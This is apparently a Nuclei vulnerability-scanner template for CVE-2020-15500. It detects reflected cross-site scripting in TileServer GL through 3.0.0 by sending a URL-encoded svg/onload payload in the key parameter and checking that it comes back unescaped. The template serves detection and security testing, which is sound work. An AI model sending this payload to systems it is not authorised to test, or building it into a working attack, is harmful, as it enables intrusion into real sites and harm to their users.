id: CVE-2020-15500

info:
  name: TileServer GL Reflected XSS
  author: Akash.C
  severity: medium
  description: An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15500
    - https://github.com/maptiler/tileserver-gl/issues/461
    - http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-15500
    cwe-id: CWE-79
  tags: cve,cve2020,xss,tileserver

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        words:
          - "'>\"<svg/onload=confirm('xss')>"
        part: body